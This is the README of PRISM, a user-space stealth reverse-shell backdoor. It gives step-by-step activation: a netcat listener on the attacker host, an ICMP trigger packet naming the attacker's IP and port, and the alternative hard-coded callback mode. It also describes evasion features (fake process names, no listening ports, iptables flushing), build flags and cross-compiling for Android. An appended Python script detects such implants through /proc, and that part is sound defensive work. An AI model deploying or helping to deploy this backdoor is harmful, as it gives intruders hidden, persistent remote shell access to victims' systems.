
Prism backdoor

PRISM is a user-space stealth reverse shell backdoor. The code is available on GitHub.

It has been fully tested on:

  • Linux
  • Solaris
  • AIX
  • BSD/Mac
  • Android

PRISM can work in two different modes: ICMP and STATIC.

ICMP mode

In this operation mode the backdoor waits silently in the background for a specific ICMP packet containing the host/port to connect back to and a private key that prevents third-party access.

  • First, run netcat on the attacker machine to wait for the incoming connection from the backdoor:

    $ nc -l -p 6666

  • Using the sendPacket.py script (or another packet builder), send the activation packet to the backdoor:

    ./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666

    192.168.0.1 is the victim machine running the prism backdoor
    p4ssw0rd is the key
    192.168.0.10 is the attacker machine address
    6666 is the attacker machine port

  • The backdoor will connect back to netcat!

STATIC mode

In this operation mode the backdoor tries to connect to a hard-coded IP/PORT.
In this case, just run netcat listening on the hard-coded machine/port:

    $ nc -l -p [PORT]

Features

  • Two operating modes (ICMP and STATIC)
  • Runtime process renaming
  • No listening ports
  • Automatic iptables rules flushing
  • Written in pure C
  • No library dependencies

Get the code

git clone https://github.com/andreafabrizi/prism.git

Configuration

Before building, you have to configure the backdoor by editing the source code.
The configuration parameters are described below:

STATIC mode:
REVERSE_HOST: Machine address to connect back
REVERSE_PORT: Machine port to connect back
RESPAWN_DELAY: Time, in seconds, between each connection

ICMP mode:
ICMP_KEY: Key/Password to activate the backdoor

Generic parameters:
MOTD: Message to be printed at the backdoor connection
SHELL: Shell to execute
PROCESS_NAME: Fake process name

Building

gcc <..OPTIONS..> -Wall -s -o prism prism.c

Available GCC options:
-DDETACH    # Run the process in the background
-DSTATIC    # Enable STATIC mode (default is ICMP mode)
-DNORENAME  # Do not rename the process
-DIPTABLES  # Try to flush all iptables rules

Example:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

Cross Compiling

  • Android
    Change the shell to /system/bin/sh
    apt-get install gcc-arm-linux-gnueabi
    arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism

  • Linux 64bit (using a 32bit host system)
    apt-get install libc6-dev-amd64
    gcc -DDETACH -m64 -Wall -s -o prism prism.c

  • Linux 32bit (using a 64bit host system)
    apt-get install libc6-dev-i386
    gcc -DDETACH -m32 -Wall -s -o prism prism.c

Backdoor building information

The backdoor ignores any command-line parameter except Inf0 (note that the last character is the digit zero, not a letter).
This option allows you to see some information about the backdoor:

$ ./prism Inf0
 Version: 0.5
 Mode: icmp
 Key: p455w0rD
 Process name: [udevd]
 Shell: /bin/sh
 Detach: Yes
 Flush Iptables: No
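The two properties the README advertises, a fake process name (PROCESS_NAME, shown as [udevd] in the Inf0 output above) and a reverse shell that opens no listening port, are also the host artefacts a responder looks for on a suspect Linux machine. The sweep below is an added example and is not code from the prism project. It assumes (these are my assumptions, not documented behaviour of the tool) that the runtime renaming changes only what ps displays, i.e. argv[0], while /proc/<pid>/exe still resolves to the binary on disk, and that the spawned shell (the SHELL setting, /bin/sh above) keeps its stdin/stdout/stderr bound to the TCP socket. Both checks are generic reverse-shell heuristics rather than anything specific to this code base, and the decision logic is kept separate from the /proc reads so it can be exercised on constructed records.

```python
#!/usr/bin/env python3
"""Added example, not part of the prism project: a /proc sweep for two host
artefacts of a renamed reverse-shell implant.  Run as root so that
/proc/<pid>/exe and /proc/<pid>/fd are readable for every process."""
import os
import re
from typing import Dict, List, Optional, Tuple

# Basenames of the resolved exe link we treat as "a shell".
# /bin/sh usually resolves to dash or bash, so the link target is what counts.
SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh"}

# ps prints real kernel threads as "[kthreadd]" because their cmdline is empty.
# A user-space process whose argv[0] literally contains the brackets is only
# imitating that look (the README's Inf0 sample shows "[udevd]").
KERNEL_THREAD_LOOK = re.compile(r"^\[[^\]]+\]$")


def fake_kernel_thread_name(argv0: str, exe_target: Optional[str]) -> bool:
    """True when a process advertises a bracketed kernel-thread style name
    while /proc/<pid>/exe resolves to an on-disk binary.  Genuine kernel
    threads have no exe target and an empty cmdline, so they never match."""
    return exe_target is not None and bool(KERNEL_THREAD_LOOK.match(argv0))


def shell_bound_to_socket(exe_target: Optional[str], std_fd_targets: List[str]) -> bool:
    """True when a shell's three standard descriptors are all sockets: the
    shell's "terminal" is the network, which is how a reverse shell looks from
    inside the host.  An interactive shell on a pty shows /dev/pts/N instead."""
    if exe_target is None:
        return False
    # The exe link carries a " (deleted)" suffix when the binary was unlinked.
    exe_base = os.path.basename(exe_target.replace(" (deleted)", ""))
    if exe_base not in SHELLS:
        return False
    return len(std_fd_targets) == 3 and all(t.startswith("socket:[") for t in std_fd_targets)


def classify(argv0: str, exe_target: Optional[str], std_fd_targets: List[str]) -> List[str]:
    """Pure decision logic, separated from /proc I/O so it can be unit-tested."""
    findings = []
    if fake_kernel_thread_name(argv0, exe_target):
        findings.append("fake-kernel-thread-name")
    if shell_bound_to_socket(exe_target, std_fd_targets):
        findings.append("shell-bound-to-socket")
    return findings


def read_proc(pid: int) -> Optional[Tuple[str, Optional[str], List[str]]]:
    """Collect (argv0, exe target, [fd0, fd1, fd2] targets) for one pid,
    or None if the process vanished while we were looking."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/cmdline", "rb") as f:
            argv0 = f.read().split(b"\0")[0].decode(errors="replace")
    except OSError:
        return None
    try:
        exe: Optional[str] = os.readlink(f"{base}/exe")
    except OSError:  # kernel thread, zombie, or not readable (EACCES when not root)
        exe = None
    fds = []
    for fd in (0, 1, 2):
        try:
            fds.append(os.readlink(f"{base}/fd/{fd}"))
        except OSError:
            fds.append("")
    return argv0, exe, fds


def scan_all() -> Dict[int, Tuple[str, Optional[str], List[str]]]:
    """Walk /proc and return {pid: (argv0, exe, findings)} for flagged processes."""
    hits = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        rec = read_proc(int(entry))
        if rec is None:
            continue
        findings = classify(*rec)
        if findings:
            hits[int(entry)] = (rec[0], rec[1], findings)
    return hits


if __name__ == "__main__":
    for pid, (argv0, exe, findings) in sorted(scan_all().items()):
        print(f"pid {pid:>6}  ps-name={argv0!r:<22} exe={exe}  {', '.join(findings)}")
```

A parent that was renamed but is not itself a shell trips only the first check; the /bin/sh child it spawns on the connection trips the second, so on a live host the two findings usually appear as a parent/child pair. Both heuristics are cheap enough to run from cron, and neither depends on a listening port or on the activation packet, which is exactly what the "No listening ports" feature is designed to deny a port-based scan.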

Contributors

andreafabrizi
